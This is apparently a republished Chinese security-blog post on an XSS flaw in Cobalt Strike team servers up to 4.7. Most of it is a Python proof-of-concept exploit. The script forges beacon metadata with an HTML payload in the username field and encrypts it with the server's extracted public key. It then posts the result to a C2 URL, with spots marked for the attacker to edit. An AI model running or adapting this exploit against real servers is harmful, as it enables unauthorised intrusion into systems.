Cobalt Strike 到 4.7 中发现了一个 XSS(跨站点脚本)漏洞,允许远程攻击者在 Cobalt Strike 团队服务器上执行 HTML。要利用此漏洞,必须首先检查 Cobalt Strike 有效负载,然后修改有效负载中的用户名字段(或使用提取的信息创建一个新有效负载,然后将该用户名字段修改为格式错误)。
POC
#!/usr/bin/env python
# coding=utf-8
import hexdump
import rsa
import random
import base64
import string
import urllib.request
#pack = b'\x00\x00\xBE\xEF' # pack head
#pack += b'\x00\x00\x00\x4C' # pack len
pack = bytearray(random.getrandbits(4) for _ in range(16)) # AESKEY
pack += b'\xa8\x03' # name charset (int) (little)
pack += b'\xa8\x03' # name charset (int) (little)
# pack+=b'\x00\x00\x00\x06' # Beacon Id random
pack += random.randint(0 , 9999999) .to_bytes(4, 'big') # Beacon Id
pack += random.randint(0 , 65535) .to_bytes(4, 'big') # Beacon Pid
pack += b'\x00\x00' # Beacon Port
pack += b'\x04' # Beacon Flag 04
pack += b'\x06'
pack += b'\x02'
pack += b'\x23\xf0\x00\x00\x00\x00' # windows version (int)
pack += b'\x76\x91' # windows version_1 (int)
pack += b'\x0a\x60\x76\x90\xf5\x50'
pack += bytearray(random.getrandbits(4) for _ in range(4)) # Beacon Ip
pack += b'\x4b\x4b'+b'\x09'+b'<html><img src=http://127.0.0.1/1.jpg>'+b'\x09'+b'\x61' # PAYLOAD LOAD A IMAGE *NEED-EDIT
pack = b'\x00\x00\xBE\xEF'+len(pack).to_bytes(4, 'big')+pack
url = 'http://192.168.234.100/pixel.gif' # C2 Server metadata post url (CobaltStrikeParser C2Server) *NEED-EDIT
pubkey = rsa.PublicKey.load_pkcs1_openssl_pem("""
-----BEGIN PUBLIC KEY-----
MIGfXXXXXXXXXXXXXXXX==
-----END PUBLIC KEY-----
""")# use the CobaltStrikeParser extract public key from the payload https://github.com/Sentinel-One/CobaltStrikeParser parse_beacon_config.py payload_url --json
#Remember to remove the extra padding from the public key *NEED-EDIT
enpack = rsa.encrypt(pack, pubkey)
header = {'Cookie': base64.b64encode(enpack).decode('utf-8')}
request = urllib.request.Request(url, headers=header)
reponse = urllib.request.urlopen(request).read()
#print('base64:', base64.b64encode(enpack).decode('utf-8'))
#print(hexdump.hexdump(pack))
Footer
文章来源:Khan安全攻防实验室
侵权请私聊公众号删文
学习更多技术,关注我:
觉得文章不错给点个‘再看’吧